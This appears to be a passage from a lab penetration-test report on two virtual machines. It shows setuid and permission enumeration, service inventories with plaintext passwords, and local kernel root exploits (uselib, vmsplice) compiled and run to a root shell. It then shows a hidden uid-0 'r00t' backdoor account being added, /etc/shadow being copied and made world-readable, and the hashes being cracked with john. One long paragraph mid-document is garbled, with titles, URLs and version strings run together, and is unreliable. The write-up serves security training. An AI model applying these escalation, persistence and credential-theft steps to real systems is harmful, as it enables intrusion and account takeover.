The locations of all files having the write or execute permission set for “other” were gathered (-perm +003). This may provide the ability to modify data or execute tasks we normally should not have privileges to; the world-writable subset is the one worth reviewing first.

[cptvm1@cptvm1 ~ ]$ find / -type f -a -not -type l -a -perm +003 -printf "%m %u %g %h/%f\n" > ~/find-typef-a-not-typel-a-perm003_200.txt

The locations of all setuid files were gathered. This provides the list of executables that run as their owner rather than as the caller, which should be researched for exploits. Note that -perm +4000 matches any setuid file regardless of owner, so the owner column (%u) must be checked to keep only the binaries that actually execute as root.

[cptvm1@cptvm1 ~ ]$ find / -type f -a -not -type l -a -perm +4000 -printf "%m %u %g %h/%f\n" > ~/find-typef-a-not-typel-a-perm4000_200.txt

The information gathered during this phase was used mainly for exploit research.

From the information gathered during this step, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)
  Operating system: Linux
  Kernel version: 2.4.20-8
  TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770
  TCP services:
    7/tcp      echo
    21/tcp     ftp        vsftpd 1.1.3
    22/tcp     ssh        OpenSSH 3.5p1 (protocol 1.99)
    23/tcp     telnet     Linux telnetd
    79/tcp     finger     Linux fingerd
    80/tcp     http       Apache httpd 2.0.40 (Red Hat Linux)
    109/tcp    POSSIBLY pop2
    110/tcp    pop3       ipopd 2001.78rh
    111/tcp    rpcbind    2 (rpc #100000)
    143/tcp    imap       UW Imapd 2001.315rh
    199/tcp    smux       Linux SNMP multiplexer
    443/tcp    ssl/http   Apache httpd 2.0.40 (Red Hat Linux)
    686/tcp    rquotad    1-2 (rpc #100011)
    993/tcp    imaps
    995/tcp    pop3s
    6000/tcp   X11
    32768/tcp  status     1 (rpc #100024)
    32770/tcp  mountd     1-3 (rpc #100005)
  UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
  UDP services:
    7/udp      echo
    13/udp     daytime
    37/udp     time (32 bits)
    111/udp    rpcbind    2 (rpc #100000)
    123/udp    ntp
    161/udp    snmp       SNMPv1 server (public)
    162/udp    snmptrap
    631/udp    unknown
    683/udp    rquotad    1-2 (rpc #100011)
  User accounts: adm, apache, bin, cptvm1, cptvm2, daemon, distcache, ftp, games, gdm, gopher, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp, operator, pcap, postgres, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd, sync, user, uucp, vcsa, webalizer, xfs
  Files that execute as root: /usr/bin/sudo, /usr/bin/rsh, /usr/bin/newgrp, /usr/lib/news/bin/rnews, /usr/sbin/ping6, /bin/umount, /usr/bin/rlogin, /usr/bin/gpasswd, /bin/mount, /sbin/unix_chkpwd, /usr/bin/chage, /usr/bin/rcp, /sbin/pam_timestamp_check, /usr/bin/chfn, /usr/lib/news/bin/startinnfeed, /usr/sbin/userisdnctl, /bin/ping, /usr/sbin/traceroute, /usr/libexec/openssh/ssh-keysign, /usr/sbin/userhelper, /sbin/pwdb_chkpwd, /usr/bin/passwd, /usr/bin/crontab, /usr/sbin/usernetctl, /usr/bin/chsh, /usr/sbin/suexec, /usr/bin/lppasswd, /bin/su, /usr/lib/news/bin/inndstart, /usr/X11R6/bin/XFree86, /usr/bin/at, /usr/sbin/traceroute6
  Username/password: user/digital, cptvm1/windows, cptvm2/linux

cptvm2 (192.168.1.104)
  Operating system: Linux
  Kernel version: Linux 2.6.23
  TCP ports: 22, 111, 939
  TCP services:
    22/tcp     ssh        OpenSSH 4.3 (protocol 2.0)
    111/tcp    rpcbind    2 (rpc #100000)
    939/tcp    status     1 (rpc #100024)
  User accounts: adm, apache, avahi, bin, cptvm1, cptvm2, daemon, dbus, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp, operator, pcap, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd, sync, uucp, vcsa, webalizer, xfs
  Username/password: cptvm1/windows, cptvm2/linux

ii. cptvm2

Various data was gathered pertaining to the kernel version and the permissions of files within the system. Items of interest were files having permissions set to run as root, files having permissions incorrectly set to allow anyone to read/write/execute them, and files owned by one of the accounts with a known password.

Up to this point, the specific version of the Linux kernel was not known. To gather this information, the uname command was used.

[cptvm1@localhost ~ ]$ uname -a
Linux localhost.localdomain 2.6.18-8.el5 #1 SMP Thu Mar 15 19:57:35 EDT 2007 i686 i686 i386 GNU/Linux

The locations of all files owned by the “cptvm1” and “cptvm2” accounts (accounts we have passwords for) were gathered. This may provide the ability to access data or executables we normally should not have privileges to.

[cptvm1@localhost ~ ]$ find / -type f -a \( -user cptvm1 -o -user cptvm2 \) -printf "%m %u %g %h/%f\n" > ~/find-typef-a-usercptvm1-o-usercptvm2_104.txt

The locations of all files that are owned by a group we belong to and are group-writable or group-executable were gathered. This may provide the ability to modify data or execute tasks we normally should not have privileges to.

[cptvm1@localhost ~ ]$ find / -type f -a -not -type l -a -perm +030 -a \( -group cptvm1 -o -group cptvm2 \) -printf "%m %u %g %h/%f\n" > ~/find-typef-a-not-typel-a-perm030-a-groupcptvm1-o-groupcptvm2_104.txt

The locations of all files having the write or execute permission set for “other” were gathered. This may provide the ability to modify data or execute tasks we normally should not have privileges to.

[cptvm1@localhost ~ ]$ find / -type f -a -not -type l -a -perm +003 -printf "%m %u %g %h/%f\n" > ~/find-typef-a-not-typel-a-perm003_104.txt

The locations of all setuid files were gathered. Filtered to root-owned binaries, this provides the list of executables that should be researched for exploits.

[cptvm1@localhost ~ ]$ find / -type f -a -not -type l -a -perm +4000 -printf "%m %u %g %h/%f\n" > ~/find-typef-a-not-typel-a-perm4000_104.txt

The information gathered during this phase was used mainly for exploit research. However, several files of interest were discovered, namely the CISngtool (Center for Internet Security, http://www.cisecurity.org) Next Generation scoring tool.

From the information gathered during this step, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)
  Operating system: Linux
  Kernel version: 2.4.20-8
  TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770
  TCP services:
    7/tcp      echo
    21/tcp     ftp        vsftpd 1.1.3
    22/tcp     ssh        OpenSSH 3.5p1 (protocol 1.99)
    23/tcp     telnet     Linux telnetd
    79/tcp     finger     Linux fingerd
    80/tcp     http       Apache httpd 2.0.40 (Red Hat Linux)
    109/tcp    POSSIBLY pop2
    110/tcp    pop3       ipopd 2001.78rh
    111/tcp    rpcbind    2 (rpc #100000)
    143/tcp    imap       UW Imapd 2001.315rh
    199/tcp    smux       Linux SNMP multiplexer
    443/tcp    ssl/http   Apache httpd 2.0.40 (Red Hat Linux)
    686/tcp    rquotad    1-2 (rpc #100011)
    993/tcp    imaps
    995/tcp    pop3s
    6000/tcp   X11
    32768/tcp  status     1 (rpc #100024)
    32770/tcp  mountd     1-3 (rpc #100005)
  UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
  UDP services:
    7/udp      echo
    13/udp     daytime
    37/udp     time (32 bits)
    111/udp    rpcbind    2 (rpc #100000)
    123/udp    ntp
    161/udp    snmp       SNMPv1 server (public)
    162/udp    snmptrap
    631/udp    unknown
    683/udp    rquotad    1-2 (rpc #100011)
  User accounts: adm, apache, bin, cptvm1, cptvm2, daemon, distcache, ftp, games, gdm, gopher, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp, operator, pcap, postgres, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd, sync, user, uucp, vcsa, webalizer, xfs
  Files that execute as root: /usr/bin/sudo, /usr/bin/rsh, /usr/bin/newgrp, /usr/lib/news/bin/rnews, /usr/sbin/ping6, /bin/umount, /usr/bin/rlogin, /usr/bin/gpasswd, /bin/mount, /sbin/unix_chkpwd, /usr/bin/chage, /usr/bin/rcp, /sbin/pam_timestamp_check, /usr/bin/chfn, /usr/lib/news/bin/startinnfeed, /usr/sbin/userisdnctl, /bin/ping, /usr/sbin/traceroute, /usr/libexec/openssh/ssh-keysign, /usr/sbin/userhelper, /sbin/pwdb_chkpwd, /usr/bin/passwd, /usr/bin/crontab, /usr/sbin/usernetctl, /usr/bin/chsh, /usr/sbin/suexec, /usr/bin/lppasswd, /bin/su, /usr/lib/news/bin/inndstart, /usr/X11R6/bin/XFree86, /usr/bin/at, /usr/sbin/traceroute6
  Username/password: user/digital, cptvm1/windows, cptvm2/linux

cptvm2 (192.168.1.104)
  Operating system: Linux
  Kernel version: Linux 2.6.18-8
  TCP ports: 22, 111, 939
  TCP services:
    22/tcp     ssh        OpenSSH 4.3 (protocol 2.0)
    111/tcp    rpcbind    2 (rpc #100000)
    939/tcp    status     1 (rpc #100024)
  User accounts: adm, apache, avahi, bin, cptvm1, cptvm2, daemon, dbus, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp, operator, pcap, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd, sync, uucp, vcsa, webalizer, xfs
  Files that execute as root: /usr/bin/sudo, /usr/bin/sudoedit, /usr/bin/rsh, /usr/bin/newgrp, /bin/umount, /sbin/umount, /sbin/umount.nfs, /sbin/umount.nfs4, /usr/bin/rlogin, /usr/bin/gpasswd, /bin/mount, /sbin/mount, /sbin/mount.nfs, /sbin/mount.nfs4, /sbin/unix_chkpwd, /usr/bin/chage, /usr/bin/rcp, /sbin/pam_timestamp_check, /usr/bin/chfn, /usr/sbin/userisdnctl, /bin/ping, /bin/ping6, /usr/bin/Xorg, /usr/libexec/openssh/ssh-keysign, /usr/sbin/userhelper, /usr/bin/passwd, /usr/bin/crontab, /usr/sbin/usernetctl, /usr/bin/chsh, /usr/sbin/suexec, /usr/bin/at, /usr/kerberos/bin/ksu, /usr/sbin/ccreds_validate, /usr/lib/squid/ncsa_auth, /usr/lib/squid/pam_auth, /media/.hal-mtab-lock
  Username/password: cptvm1/windows, cptvm2/linux
G. Penetration of cptvm1

i. Local exploit research via anyside.org

The list of files designated to execute as root was processed to obtain only the base name of each file. This list would be used to search against the anyside.org exploit list.

$ awk '{ print "basename ", $4 }' suid_root_200.txt > basename_200.txt
$ chmod +x basename_200.txt
$ ./basename_200.txt | sort -u > basename-2_200.txt
$ cat basename-2_200.txt
XFree86
at
chage
chfn
chsh
crontab
gpasswd
inndstart
lppasswd
mount
newgrp
pam_timestamp_check
passwd
ping
ping6
pwdb_chkpwd
rcp
rlogin
rnews
rsh
ssh-keysign
startinnfeed
su
sudo
suexec
traceroute
traceroute6
umount
unix_chkpwd
userhelper
userisdnctl
usernetctl

The list of exploits used during the remote exploit search (exploits_list.txt, extracted from the anyside.org archive) was re-used to search for local exploits on the cptvm1 host. Only entries under exploits/local were considered, and each base name was matched as a whole word, case-insensitively, against the entry titles.

$ ll
total 1672
drwxr-xr-x   7 matt  matt     238 Feb 21 14:47 ./
drwxr-xr-x  15 matt  matt     510 Feb 21 14:47 ../
-rw-r--r--   1 matt  matt  126720 Feb  6 14:40 exploits_list.tgz
-rw-r--r--   1 matt  matt  702666 Sep 21 05:52 exploits_list.txt
-rw-r--r--   1 matt  matt    1699 Feb 15 20:34 possible_local_200.txt
-rw-r--r--   1 matt  matt    9376 Feb  6 14:43 possible_remote_200.txt
$ grep exploits\/local exploits_list.txt | grep -w -i -f ../commands/basename-2_200.txt > possible_local_200.txt
$ cat possible_local_200.txt

The results of the search were 13 possible exploits:

- http://www.anyside.org/exp/exploits/local/2006071503.txt - Rocks Clusters <= 4.1 (mount-loop) Local Root Exploit 2006-07-15
- http://www.anyside.org/exp/exploits/local/2006030101.txt - Rocks Clusters <= 4.1 (umount-loop) Local Root Exploit 2006-03-01
- http://www.anyside.org/exp/exploits/local/2006012501.txt - Apple Mac OS X (/usr/bin/passwd) Custom Passwd Local Root Exploit 2006-01-25
- http://www.anyside.org/exp/exploits/local/2005110801.txt - Sudo <= 1.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit 2005-11-08
- http://www.anyside.org/exp/exploits/local/2005070403.txt - SuSE Linux <= 9.3, 10 (chfn) Local Root Privilege Escalation Exploit 2005-07-04
- http://www.anyside.org/exp/exploits/local/2005110903.txt - FreeBSD (4.x, < 5.4) master.passwd Disclosure Exploit 2005-11-09
- http://www.anyside.org/exp/exploits/local/2005110902.txt - SquirrelMail 3.1 Change Passwd Plugin Local Buffer Overflow Exploit
- http://www.anyside.org/exp/exploits/local/r57sudo.c - Sudo 1.6.8p local root exploit 2004-9-11
- http://www.anyside.org/exp/exploits/local/xlock-XLOCALEDIR.c - Local root exploit utilizing the overflow in XLOCALEDIR under XFree86. Written to work on Redhat 7.3 using xlock.
- http://www.anyside.org/exp/exploits/local/x_hpux_11i_nls_cu.c - The same vulnerability to x_hpux11i_nls_ct.c but exploit ping command to get root shell 2004-9-19
- sudo exploit.
- OpenBSD sudo 1.6.8p Pathname Validation Local Root Exploit (openbsd)
- cdrecord $RSH exec() SUID Shell Creation
- http://www.anyside.org/exp/exploits/local/2006071502.txt

The whole-word match still produces noise: short base names such as “at”, “su” or “ping” match as ordinary words in unrelated titles, so the result list has to be reviewed by hand.

The “Rocks Clusters <= 4.1 (mount-loop) Local Root Exploit”, “Rocks Clusters <= 4.1 (umount-loop) Local Root Exploit”, “Apple Mac OS X (/usr/bin/passwd) Custom Passwd Local Root Exploit”, “OpenBSD sudo 1.6.8p Pathname Validation Local Root Exploit (openbsd)”, “SuSE Linux <= 9.3, 10 (chfn) Local Root Privilege Escalation Exploit”, “FreeBSD (4.x, < 5.4) master.passwd Disclosure Exploit” and “The same vulnerability to x_hpux11i_nls_ct.c but exploit ping command to get root shell” exploits can be ruled out as they are written for operating systems other than the Red Hat Linux installed on the host. The “SquirrelMail 3.1 Change Passwd Plugin Local Buffer Overflow Exploit” and “cdrecord $RSH exec() SUID Shell Creation” exploits can also be ruled out as they are for applications that don't exist on the host.

The “Local root exploit utilizing the overflow in XLOCALEDIR under XFree86” exploit was checked against the installed X server:

[cptvm1@cptvm1 commands]$ X -version
XFree86 Version 4.3.0 (Red Hat Linux release: 4.3.0-2)
Release Date: 27 February 2003
X Protocol Version 11, Revision 0, Release 6.6
Build Operating System: Linux 2.4

The version of XFree86 was found to be 4.3.0 (Red Hat Linux release 4.3.0-2), which does not match the version the exploit was written for, thus eliminating XFree86 from the list of potential exploits. This leaves us with 3 possible exploits: “Sudo <= 1.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit”, “Sudo 1.6.8p local root exploit” and “sudo exploit.”
“FreeBSD (4.org/exp/exploits/local/cdrecordsuidshell.8p Pathname Validation Local Root Exploit (openbsd) .OpenBSD sudo 1.20-3bigmem i686 [ELF] Build Date: 27 February 2003 Build Host: porky.http://www.cdrecord $RSH exec() SUID Shell Creation .3.txt..but exploit ping command to get root shell” exploits can be ruled out as they are written for operating systems different than the one we are on.c.2.http://www..2.1.1 Change Passwd Plugin Local Buffer Overflow Exploit 2005-11-09.org/exp/exploits/local/sudo-exploit..http://www.http://www.http://www.http://www.x using xlock.2. 2-5)) #1 Thu Mar 13 17:54:28 EST 2003 The version of sudo was found to be 1. Instead of a typical buffer overflow exploit.devel.6. chfn.org web site. 24 exploits in total. This enables a local user with access to the inndstart program to create their own innd.Before reporting problems. rsh.conf configuration file. The “sudo exploit” exploit doesn't provide enough information about its requirements to rule it out. The remaining exploits.org Searches for exploits of at. more research into this exploit was suspended. Without a more detailed description. chage. To make things easier.XFree86. check http://www.Org/ to make sure that you have the latest version. Most of the exploits were eliminated due to mismatches on the operating system or version. it was downloaded and the code reviewed. traceroute. a bin directory was created within the “cptvm1” user's home directory. crontab. ping. . An environment variable named INNCONF can be defined to point to the location of the inn. unix_chckpwd.2 20030222 (Red Hat Linux 3. compiled and tested. were downloaded.2. this exploit was caused by a poorly planned application feature. umount. A search for “inndstart” provided an interesting exploit. newgrp. rnews. Module Loader present OS Kernel: Linux version 2. chsh. rlogin. Unfortunately. sudo. passwd. No successful exploits for the executables listed above were found. 
Attempting to download the exploit resulted in a 404 error from the anyside.conf file with a "pathrun" component pointing to a directory owned by root and defining a program of their choosing to be executed as root. [cptvm1@cptvm1 commands]$ sudo -V Sudo version 1. Local exploit research via secwatch.4.6.com) (gcc version 3.redhat. So.6. suexec. ii. reviewed.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit”.6 The version of sudo fits within the requirements for the “ Sudo <= 1. this exploit relies on an entry within the /etc/sudoers file that points to a file the user has full access to modify. It should be noted that the gcc compiler on the cptvm1 host was named gcc296. a symbolic link named gcc was created for gcc296 and the bin directory was added to the PATH.20-8 (bhcompile@porky. ping6. rcp. pam_timestamp_check. mount.2. lppasswd. userhelper and xfree86 returned quite a number of results. This situation does not exist on the cptvm1 host. org. A search on milw0rm. when the same search string was entered directly on a site. In several cases. the “Linux Kernel 2. iii. The quality of the exploit code on milw0rm. the secwatch.com as the primary search site was made.While this exploit sounded promising.x-2.4.org search aggregates exploit search results from several other sites into a single result page. With the issues found with the search mechanism of secwatch. ruling this exploit out.com for “linux kernel 2. .org site provides a search mechanism that is superior to anyside.20. the search mechanism only appears to work optimally with single words. The “Linux Kernel 2.4".org. a switch to milw0rm. Ultimately.4. Immediately. Illustration 1: Milw0rm search results for "linux kernel 2. a search using multiple words received no results back from secwatch. multiple exploits were found. The secwatch. Unfortunately. Privilege escalation using a Kernel VMA exploit Overall. 
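The basename/grep pipeline above is the report's way of asking which set-uid binaries have published advisories; the same question is what a defender asks when prioritising patches. The script below is an added example (not code from the report or from any site it names) that does the same reduction in one pass without writing and executing a generated script, and explains each hit so that matches caused by short names such as "at" or "mount" can be triaged. The listing, the advisory index and their four-column layout are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the report): SUID inventory reduced to unique base
# names and matched, whole-word and case-insensitively, against an advisory
# index, with each hit explained. All input below is constructed.

# Constructed listing in the four-column shape the report's `awk '$4'` implies
# (mode owner group path); a subset of cptvm1's "files that execute as root".
SUID_LISTING='-rwsr-xr-x root root /usr/bin/sudo
-rwsr-xr-x root root /usr/bin/at
-rwsr-xr-x root root /bin/mount
-rwsr-xr-x root root /bin/umount
-rwsr-xr-x root root /usr/bin/passwd
-rwsr-xr-x root root /usr/sbin/userhelper
-rwsr-xr-x root root /usr/X11R6/bin/XFree86
-rwsr-xr-x root root /sbin/unix_chkpwd'

# Constructed advisory index, one title per line, in the style of the entries
# the report pulled out of its exploit list (titles only).
ADVISORY_INDEX='Rocks Clusters <= 4.1 (mount-loop) Local Root Exploit
Sudo <= 1.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit
Apple Mac OS X (/usr/bin/passwd) Custom Passwd Local Root Exploit
cdrecord $RSH exec() SUID Shell Creation
Local root exploit utilizing the overflow in XLOCALEDIR under XFree86 Version 4.2.x using xlock'

# suid_basenames: read a listing on stdin, keep column 4, strip the directory
# part and emit one unique base name per line in C-locale order.
suid_basenames() {
    awk 'NF >= 4 { print $4 }' | sed 's#.*/##' | LC_ALL=C sort -u
}

# match_advisories NAMES_FILE: print the index lines (stdin) containing one of
# the base names as a whole word, case-insensitively. -F takes names such as
# ping6 or ssh-keysign literally instead of as regular expressions.
match_advisories() {
    grep -w -i -F -f "$1"
}

# explain_hits NAMES_FILE: print "name: title" for every base name that occurs
# in an index line (stdin) as a whole word, so the analyst sees which binary
# produced each hit. Word boundaries are any non [a-z0-9_] run, like grep -w.
explain_hits() {
    awk -v namefile="$1" '
        BEGIN {
            while ((getline n < namefile) > 0) {
                k = tolower(n); gsub(/[^a-z0-9_]+/, " ", k); key[n] = " " k " "
            }
        }
        {
            line = " " tolower($0) " "; gsub(/[^a-z0-9_]+/, " ", line)
            for (n in key) if (index(line, key[n])) printf "%s: %s\n", n, $0
        }' | LC_ALL=C sort
}

# review_suid: run the whole pipeline on the constructed data.
review_suid() {
    names=$(mktemp) || return 1
    printf '%s\n' "$SUID_LISTING" | suid_basenames > "$names"
    printf '%s\n' "$ADVISORY_INDEX" | explain_hits "$names"
    rm -f "$names"
}

review_suid
```

On the constructed data the index line for cdrecord produces no hit, while "mount" matches the Rocks Clusters title through the hyphenated "mount-loop", which is exactly the kind of whole-word coincidence the report had to rule out by hand.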
iii. Privilege escalation using a Kernel VMA exploit

With the issues found with the search mechanism of secwatch.org, a switch to milw0rm.com as the primary search site was made. The quality of the exploit code on milw0rm.com appears to be quite a bit better than the code on the other sites that were searched. A search on milw0rm.com for “linux kernel 2.4” resulted in the following exploits.

Illustration 1: Milw0rm search results for "linux kernel 2.4"

Immediately, the “Linux Kernel 2.4.x / 2.6.x Assembler Inline Function Local DoS Exploit” exploit can be removed from the list as it isn't a root exploit. The “Linux Kernel 2.4.22 "do_brk()" local Root Exploit (PoC)” exploit can also be removed as the kernel version in use is 2.4.20. This left 5 exploits: “Linux Kernel 2.6 x86-64 System Call Emulation Exploit”, “Linux Kernel 2.4.x mremap() bound checking Root Exploit”, “Linux Kernel 2.4.x uselib() Local Privilege Escalation Exploit”, “Linux Kernel 2.4 uselib() Privilege Elevation Exploit” and “Linux Kernel 2.4/2.6 bluez Local Root Privilege Escalation Exploit (update)”. The exploits were taken in order, compiled and executed. The Tim Hsu, 2005-01-27, “Linux Kernel 2.4 uselib() Privilege Elevation Exploit” resulted in a shell with root access.

[cptvm1@cptvm1 kernel-uselib]$ ll
total 56
drwxr-xr-x   2 cptvm1 cptvm1  4096 Jan 28 02:10 ./
drwxr-xr-x  42 cptvm1 cptvm1  4096 Feb 14  2009 ../
-rwxrwxr-x   1 cptvm1 cptvm1 27027 Jan 28 02:10 uselib*
-rw-r--r--   1 cptvm1 cptvm1 18774 Feb 14  2009 uselib.c
[cptvm1@cptvm1 kernel-uselib]$ gcc -o uselib uselib.c
[cptvm1@cptvm1 kernel-uselib]$ ./uselib
[+] SLAB cleanup
    child 1 VMAs 32
[+] moved stack bfffd000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xcfc00000 - 0xdf548000
Wait...
[+] race won maps=58028
    expanded VMA (0xbfffc000-0xffffe000)
[!] try to exploit 0xd096c000
[+] gate modified ( 0xffec9523 0x0804ec00 )
[+] exploited, uid=0

sh-2.05b# env
TERM=vt100
PWD=/home/cptvm1/cpt/exploits/kernel-uselib
SHLVL=1
HISTFILE=/dev/null
_=/bin/env
sh-2.05b# export PATH=/usr/bin:/usr/sbin:/bin:/sbin
sh-2.05b# id
uid=0(root) gid=0(root) groups=501(cptvm1)
sh-2.05b#

iv. Maintaining access via creation of a new “r00t” account

After the successful use of the Kernel VMA exploit, consistent root access to the cptvm1 host was required. The creation of a new user account having the same user id and group id as the real root account was accomplished via the standard Linux useradd script. After the creation of the account, the password was set to “expl0ited”. While setting the password to a variant of a dictionary word seemed like a good idea, this caused the shadow password cracking phase to take quite a bit longer.

sh-2.05b# useradd -u 0 -o -g 0 -d /root r00t
sh-2.05b# passwd r00t
Changing password for user r00t.
New password:
BAD PASSWORD: it is based on a dictionary word
Retype new password:
passwd: all authentication tokens updated successfully.

v. Gathering the shadow password file

With the successful creation of a method to gain root access in the future, the gathering of the shadow password file could be accomplished. In this case, the shadow password file was copied within the shell created by the Kernel VMA exploit. However, it could have also been gathered via the new “r00t” account. While not required, the group shadow file was also copied.

sh-2.05b# cp /etc/shadow /tmp
sh-2.05b# cp /etc/gshadow /tmp
sh-2.05b# chmod a+rw /tmp/shadow
sh-2.05b# chmod a+rw /tmp/gshadow
sh-2.05b# cd /tmp
sh-2.05b# ls -alF gshadow shadow
-rw-rw-rw-    1 root     root          512 Feb 15 02:15 gshadow
-rw-rw-rw-    1 root     root         1206 Feb 15 02:15 shadow
sh-2.05b#
H. Cracking passwords of the cptvm1 host

i. Cracking of “user”, “cptvm1” and “cptvm2”

With full access to the shadow password file, the process of cracking the passwords contained within was started. In this case, the “john” utility was used. Within a few minutes the passwords for the user, cptvm1 and cptvm2 user accounts were cracked (not really required as they had already been brute forced). However, the root and r00t accounts took quite a bit longer to crack. While the john session named “cptvm1” was left to run, research on exploits for the cptvm2 host was started.

bt cptvm1 # john --session=cptvm1 shadow
Loaded 5 password hash (FreeBSD MD5 [32/32])
digital          (user)
windows          (cptvm1)
linux            (cptvm2)
guesses: 3  time: 0:05:24:14 (3)  c/s: 5722  trying: tubt
Session aborted
bt cptvm1 # john -show shadow
user:digital:14019:0:99999:7:::
cptvm1:windows:14019:0:99999:7:::
cptvm2:linux:14019:0:99999:7:::

3 password hashes cracked, 2 left
bt cptvm1 # john --session=cptvm1 --users=root shadow
Loaded 1 password hash (FreeBSD MD5 [32/32])

I. Penetration of cptvm2

i. Privilege escalation using a Kernel vmsplice exploit

Since the cptvm1 host fell to a kernel exploit, time was not spent researching third party application and system utility exploits on the cptvm2 host. A search on milw0rm.com for “linux kernel 2.6” resulted in the following exploits.

Illustration 2: Milw0rm search results for "linux kernel 2.6"

Immediately, the “Linux Kernel 2.6.x sys_timer_create() Local Denial of Service Exploit”, “Linux Kernel 2.6.27.7-generic … 2.6.24-1 Local DoS Exploit” and “Linux Kernel 2.6.x Firewall Logging Rules Remote DoS Exploit” exploits can be removed from the list as they aren't root exploits. In addition, the “Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit”, “Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (2)”, “Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (3)”, “Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (4)”, “Linux Kernel 2.6.13 <= 2.6.17.4 prctl() Local Root Exploit (logrotate)” and “Linux Kernel 2.6.23 - 2.6.24 vmsplice Local Root Exploit” exploits can also be removed from the list as they aren't for the 2.6.18 version of the kernel. This left 2 exploits: “Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit” and “Linux Kernel 2.6.x chown() Group Ownership Alteration Exploit”. The exploits were taken in order, compiled and executed. The qaaz, 2008-02-09, “Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit” resulted in a shell with root access.

[cptvm1@localhost kernel26_vmsplice]$ ll
total 16
-rw-r--r-- 1 cptvm1 cptvm1 6293 Feb 15  2009 jessica_biel_naked_in_my_bed.c
[cptvm1@localhost kernel26_vmsplice]$ gcc -o jessica_biel_naked_in_my_bed jessica_biel_naked_in_my_bed.c
[cptvm1@localhost kernel26_vmsplice]$ ll
total 28
-rwxrwxr-x 1 cptvm1 cptvm1 8522 Feb  7 04:05 jessica_biel_naked_in_my_bed
-rw-r--r-- 1 cptvm1 cptvm1 6293 Feb 15  2009 jessica_biel_naked_in_my_bed.c
[cptvm1@localhost kernel26_vmsplice]$ ./jessica_biel_naked_in_my_bed
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7f36000 .. 0xb7f68000
[+] root
[root@localhost kernel26_vmsplice]# id
uid=0(root) gid=0(root) groups=500(cptvm1)
[root@localhost kernel26_vmsplice]#

ii. Maintaining access via creation of a new “r00t” account

After the successful use of the Kernel vmsplice exploit, consistent root access to the cptvm2 host was required. The creation of a new user account having the same user id and group id as the real root account was accomplished via the standard Linux useradd script. After the creation of the account, the password was set to “windows”. The previous password generation mistake of setting a “tough” password was not repeated.

[root@localhost kernel26_vmsplice]# env
SSH_AGENT_PID=3134
HOSTNAME=localhost.localdomain
TERM=xterm
SHELL=/bin/bash
DESKTOP_STARTUP_ID=
HISTSIZE=1000
GTK_RC_FILES=/etc/gtk/gtkrc:/home/cptvm1/.gtkrc-1.2-gnome2
WINDOWID=48234577
USER=cptvm1
LS_COLORS=no=00:fi=00:di=00;34:ln=00;36:pi=40;33:so=00;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=00;32:*.cmd=00;32:*.exe=00;32:*.com=00;32:*.btm=00;32:*.bat=00;32:*.sh=00;32:*.csh=00;32:*.tar=00;31:*.tgz=00;31:*.arj=00;31:*.taz=00;31:*.lzh=00;31:*.zip=00;31:*.z=00;31:*.Z=00;31:*.gz=00;31:*.bz2=00;31:*.bz=00;31:*.tz=00;31:*.rpm=00;31:*.cpio=00;31:*.jpg=00;35:*.gif=00;35:*.bmp=00;35:*.xbm=00;35:*.xpm=00;35:*.png=00;35:*.tif=00;35:
GNOME_KEYRING_SOCKET=/tmp/keyring-euEoqc/socket
SSH_AUTH_SOCK=/tmp/ssh-aqCddQ3075/agent.3075
USERNAME=cptvm1
SESSION_MANAGER=local/localhost.localdomain:/tmp/.ICE-unix/3075
PATH=/usr/kerberos/sbin:/usr/bin:/usr/sbin:/bin:/sbin:/usr/kerberos/bin:/usr/local/bin:/usr/bin:/bin:/usr/X11R6/bin:/home/cptvm1/bin
DESKTOP_SESSION=default
MAIL=/var/spool/mail/cptvm1
GDM_XSERVER_LOCATION=local
PWD=/home/cptvm1/cpt/exploits/kernel26_vmsplice
INPUTRC=/etc/inputrc
XMODIFIERS=@im=none
LANG=en_US.UTF-8
GDMSESSION=default
SSH_ASKPASS=/usr/libexec/openssh/gnome-ssh-askpass
SHLVL=3
HOME=/home/cptvm1
GNOME_DESKTOP_SESSION_ID=Default
LOGNAME=cptvm1
CVS_RSH=ssh
DBUS_SESSION_BUS_ADDRESS=unix:abstract=/tmp/dbus-yuVqOWjtSW,guid=f9418d49bbcbb5875e2b080cbf709f00
LESSOPEN=|/usr/bin/lesspipe.sh %s
DISPLAY=:0.0
HISTFILE=/dev/null
G_BROKEN_FILENAMES=1
XAUTHORITY=/tmp/.gdmI40NOU
COLORTERM=gnome-terminal
_=/usr/bin/env
